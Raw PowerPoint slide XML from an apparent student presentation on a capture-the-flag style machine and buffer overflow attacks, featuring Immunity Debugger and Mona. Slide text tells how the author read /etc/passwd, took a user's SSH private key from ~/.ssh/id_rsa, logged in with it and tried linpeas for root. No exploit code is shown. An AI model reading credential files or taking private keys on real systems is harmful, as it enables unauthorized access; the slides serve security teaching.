                  <a:pt x="6415830" y="136006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6563502" y="116945"/>
                  <a:pt x="6684679" y="79367"/>
                  <a:pt x="6756965" y="57636"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6761544" y="48663"/>
                  <a:pt x="6812642" y="36519"/>
                  <a:pt x="6819400" y="30742"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6986370" y="12659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6989536" y="14528"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7002946" y="17364"/>
                  <a:pt x="7010700" y="14716"/>
                  <a:pt x="7015933" y="9653"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7020592" y="1651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702590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FE7AA35-0834-A666-48ED-733948ECCF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068738" y="5298263"/>
            <a:ext cx="10053527" cy="693937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Mina Ghattas</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17950" y="647758"/>
            <a:ext cx="8355105" cy="439265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blue lock with white text&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018843F3-9CA2-31C9-134E-0058E0867DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1420" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079812" y="805516"/>
            <a:ext cx="8032376" cy="4074026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364751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885995-13B6-D96B-FEE7-5E862F4FA836}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55DCB4F-8912-F83C-CC11-7BD99B2DE130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2691" r="2916" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866422" y="99503"/>
            <a:ext cx="9898742" cy="3329497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">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6422" y="3517997"/>
            <a:ext cx="10459156"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3E0E58A-C461-2151-347E-663D94DFF415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478972" y="3854885"/>
            <a:ext cx="10874828" cy="2384552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">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But I didn't get anything from it as it didn't have any visible passwords that I can use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">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I searched on how to access a server without the user password and found out it can be done by the ssh keys that belongs to every user alone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">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I tried the user called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shirohige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as it was mentioned in the logs endpoint and also it was the only user in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/passwd file beside laurel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So I was able to get her ssh key by going to her home then /.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413664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2EE8F1-A2EB-A012-2A18-1FA1DD8D87FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="4648200" cy="1787248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5206D5C8-589F-0BB4-67B7-41AB255E2388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4386881"/>
            <a:ext cx="4391024" cy="1047900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mohab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Yaser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">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 name="Group 12">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7" name="Freeform: Shape 16">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4" name="Group 13">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5" name="Freeform: Shape 14">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5" name="Picture 4" descr="A bowl with water on it&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89470989-D543-072F-F780-602C7FF25F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932" y="1733853"/>
            <a:ext cx="4369112" cy="2297307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182851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E97884B-2E0F-E1C6-FD2D-BAF5DD7CE956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-1325880" y="1947672"/>
            <a:ext cx="5961888" cy="2788920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABB23EC-D5C1-4C2A-809A-61E5B377B546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255183483"/>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57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C3B3B8-8036-CF6C-89C2-834F06139AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Immunity Debugger</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A0C1E79-DC9B-BAC6-AD15-230F21321AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3741076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Immunity Debugger helps you understand and control the behavior of a vulnerable application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Control instruction pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Setting Breakpoints.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Crafting Exploit Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302466F5-4213-9A5A-7EA9-197C9225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889" y="2038817"/>
            <a:ext cx="6903720" cy="4765009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286074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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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68FD600-FE82-7D3B-C456-C7F52A53CC7C}"/>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468B8-EDD9-4CFF-D764-D66B23C86D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Mona</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0CBDE51-0E3B-EC89-C701-0EFE164912BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Its a powerful script created to extend the functionality of Immunity Debugger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Its used in finding JMP/ESP Addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Generating Exploit Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Pattern Creation and Offset Calculation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Identifying Safe Modules</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1900"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2672549A-E2A3-486F-756D-71C0622285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0206" y="2137209"/>
            <a:ext cx="6903720" cy="4215806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120575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630FFE-5F4F-D1EA-62FA-B08BF16B1607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="174032"/>
            <a:ext cx="10175631" cy="1111843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9722C4F2-F826-749F-9234-1A8897D1CC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="767904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I used this key to ssh into the machine without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shirohige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> password, and got the user flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FC1A21-C947-ED6E-B9EB-F75E4C583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154" y="2435750"/>
            <a:ext cx="10515595" cy="3838191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79976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computer screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A188CF6-9905-E076-7BAC-E3672139BA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914" y="1014480"/>
            <a:ext cx="10872172" cy="233751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D2C371E0-F715-49E9-2341-41D1C037D4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481629" y="3998019"/>
            <a:ext cx="10872172" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As I logged into the machine, I tried to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>linpeas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to escalate my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privileages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and become a root.</a:t>
            </a:r>
